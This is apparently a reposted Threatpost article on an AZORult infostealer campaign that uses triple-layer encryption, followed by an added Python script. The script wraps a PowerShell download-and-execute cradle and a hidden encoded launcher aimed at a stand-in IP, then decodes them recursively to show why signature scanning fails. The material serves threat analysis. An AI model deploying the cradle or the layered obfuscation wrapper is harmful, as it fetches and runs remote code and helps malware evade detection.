
AZORult Campaign Adopts Novel Triple-Encryption Technique
2020-02-03 20:58

A recent wave of AZORult-laced spam caught the attention of researchers who warn that malicious attachments associated with the campaign are using a novel obfuscation technique, in an attempt to slip past spam gateways and avoid client-side antivirus detection.

AZORult is an information-stealing trojan popular on Russian-language underground forums; it was most recently spotted last month in a spam campaign run by an attacker with an affinity for singer-songwriter Drake.

The third encryption layer sits in the link the dropper uses to fetch the final AZORult infostealer payload: the URL is itself stored encrypted inside the encrypted PowerShell stage, so the download location is not exposed until both outer layers have been stripped.

"The link to the remote file was protected with a third layer of encryption using the same algorithm we have seen in the PowerShell envelope," Kopriva wrote.

"My guess is that triple encryption might be a little bit more effective than most of the usual obfuscation techniques, since it is applied multiple times on multiple layers. Any sandboxing would defeat it as easily as most other obfuscation mechanisms, however it isn't a bad way to defeat signature and heuristics-based detection tools," Kopriva told Threatpost.
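As an added illustration (this is not code from the Threatpost article or from Kopriva's analysis), the Python script below models the structure described above: a download URL wrapped in a PowerShell envelope, with the same reversible routine applied at every layer, and the result carried as a third blob the way a macro would embed it. The page does not say what the real algorithm is, so XOR with a repeating key followed by base64 is an assumed stand-in; the key, the sample URL and the PowerShell text are constructed for the example. It shows why a plain string signature on the attachment sees nothing, while a decoder that reapplies the one known routine recursively still recovers the URL, which is the sandbox or analyst advantage Kopriva describes.

```python
import base64
import re

# ASSUMED stand-in for the unnamed algorithm: XOR with a repeating key, then
# base64 so the result is text-safe and can be pasted into a macro or script.
KEY = b"\x3a\x5c\x91\x07"  # constructed key, illustrative only


def xor(data: bytes, key: bytes = KEY) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def wrap(plain: bytes) -> str:
    """One encryption layer: XOR, then base64."""
    return base64.b64encode(xor(plain)).decode("ascii")


def unwrap(blob: str) -> bytes:
    """Inverse of wrap(); raises on input that is not valid base64."""
    return xor(base64.b64decode(blob))


def build_sample(url: str) -> str:
    """Constructed three-layer dropper mirroring the layout in the article:
    URL (layer 3) inside a PowerShell envelope (layer 2) inside the blob the
    macro carries (layer 1). Every layer uses the same wrap() routine."""
    layer3 = wrap(url.encode())
    ps_script = (f"$u=dec('{layer3}');"
                 "IEX(New-Object Net.WebClient).DownloadString($u)")
    layer2 = wrap(ps_script.encode())
    launcher = f"powershell -nop -w hidden -e {layer2}"
    return wrap(launcher.encode())


BLOB_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")      # base64-looking runs
URL_RE = re.compile(r"https?://[^\s'\"]+")
SIG_RE = re.compile(r"DownloadString|Net\.WebClient|https?://")


def signature_hit(text: str) -> bool:
    """A plain string signature, as a gateway or AV might apply to the
    attachment. Every layer encrypts the strings it would need to see."""
    return bool(SIG_RE.search(text))


def peel(blob: str, max_depth: int = 5) -> list:
    """Apply the one recovered unwrap() routine to every base64-looking token,
    recursively, and return (depth, decoded_text) for each layer found."""
    found = []

    def walk(token: str, depth: int) -> None:
        if depth > max_depth:
            return
        try:
            text = unwrap(token).decode("utf-8")
        except Exception:          # not one of ours (bad padding / not text)
            return
        found.append((depth, text))
        for m in BLOB_RE.finditer(text):
            walk(m.group(0), depth + 1)

    walk(blob, 1)
    return found


def recover_url(blob: str):
    """Return (depth, url) for the first layer that exposes a download URL."""
    for depth, text in peel(blob):
        m = URL_RE.search(text)
        if m:
            return depth, m.group(0)
    return None


if __name__ == "__main__":
    sample = build_sample("http://198.51.100.23/azo/load.bin")  # constructed
    print("signature on attachment:", signature_hit(sample))
    for depth, text in peel(sample):
        print(f"layer {depth}: {text[:60]}")
    print("recovered:", recover_url(sample))
```

The point of the `peel` loop is that repeating one algorithm across layers buys the attacker nothing against an analyst or sandbox that has recovered that algorithm once: each additional layer is one more call to the same function. Against a scanner that only matches strings on the outer blob, however, all three layers look equally opaque.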


News URL

https://threatpost.com/azorult-campaign-encryption-technique/152508/